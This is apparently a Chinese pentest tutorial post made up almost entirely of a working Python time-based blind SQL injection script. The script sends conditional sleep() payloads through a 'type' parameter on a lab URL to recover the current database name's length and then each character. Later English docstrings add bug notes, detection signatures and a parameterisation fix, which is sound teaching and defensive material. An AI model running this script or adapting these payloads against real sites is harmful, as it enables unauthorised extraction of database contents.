思路:重要的是構建payload,然後循環進行測試,通過對請求的時間進行判斷payload是否正確,從而確定數據庫的長度和數據庫的名稱.
#encoding=utf-8
#時間盲註腳本
import requests
import time
import datetime
#獲取數據庫長度
def database_len():
    """Probe the length of the current database name by response timing.

    Sends one GET per candidate length 1..14 whose ``type`` query parameter
    carries a conditional ``sleep(1)``, and treats any round-trip longer than
    one second as a match.  Because the ``break`` below is commented out,
    ``length`` keeps accumulating every candidate whose request ran slow, so
    the printed value is only the true length if exactly one candidate
    exceeded the threshold (network jitter can produce false positives).

    Nothing is returned; results are only printed.  ``database`` and
    ``response1`` are assigned but never read.

    Detection / mitigation note: the server-side signature is a burst of
    requests whose query string contains ``length(database())`` and
    ``sleep(`` and whose latency is ~1 s above baseline.  The root cause on
    the target is that ``type`` is interpolated into SQL; binding it as a
    parameter removes the timing side channel entirely.
    """
    #存放跑出的結果 -> holds the accumulated result
    length=0
    database=''  # unused
    print ("start get length...")
    for l in range(1,15):
        # Wall-clock timestamp taken immediately before the request so the
        # comparison below measures the whole round trip.
        startTime1=time.time()
        url1 = "http://172.20.10.14/pentest/test/time/?type=1 and if(length(database())=%d,sleep(1),1)"%(l)
        response1 = requests.get(url1)  # response body is not inspected
        # A slow response is interpreted as the injected condition being true.
        if time.time() - startTime1 > 1:
            length+=l  # accumulates, not assigns: see docstring
            print ("the length :" , str(length))
            # break
# Module-level side effect: the length probe runs as soon as this file is
# executed (or imported), before database_name is even defined below.
print ("start database sql injection...")
database_len()
#獲取數據庫名
def database_name():
    """Reconstruct the current database name one character at a time by timing.

    For each position 1..14 every character in ``0-9a-z`` is tried; each
    probe is a GET whose ``type`` parameter carries a conditional ``sleep(2)``.
    A request measured at two or more whole seconds is taken as a hit: the
    character is appended to ``name`` and the inner loop moves on to the next
    position.  A position with no hit contributes nothing, so a name that
    contains characters outside ``0-9a-z`` (uppercase, ``_``, ``-``) or that
    is longer than 14 comes out incomplete.

    Nothing is returned; the recovered name is printed.  ``r`` is assigned
    but never read.

    Detection / mitigation note: same pattern as ``database_len`` — many
    requests containing ``substr(database(),`` and ``sleep(`` with a ~2 s
    latency step on the matching candidate.  Parameterising ``type`` on the
    server closes the channel.
    """
    name = ''
    for j in range(1, 15): #根據數據庫名長度自行修改15這個數值 -> adjust 15 to the expected name length
        for i in '0123456789abcdefghijklmnopqrstuvwxyz':
            url = '''http://172.20.10.14/pentest/test/time/'''
            payload = '''?type=if(substr(database(),%d,1)='%s',sleep(2),1)''' % (
                j, i)
            # print(url+payload+'%23')
            time1 = datetime.datetime.now()
            # '%23' is the URL-encoded '#' appended after the payload.
            r = requests.get(url + payload + '%23')
            time2 = datetime.datetime.now()
            # timedelta.seconds is the whole-seconds field (truncated), not
            # total_seconds(); for sub-day durations it is floor(elapsed).
            sec = (time2 - time1).seconds
            if sec >= 2:
                name += i
                print(name)
                break  # first hit wins for this position
    print('database_name:', name)
# Module-level side effect: runs the character-by-character probe right after
# the length probe above.
database_name()
跑出的效果圖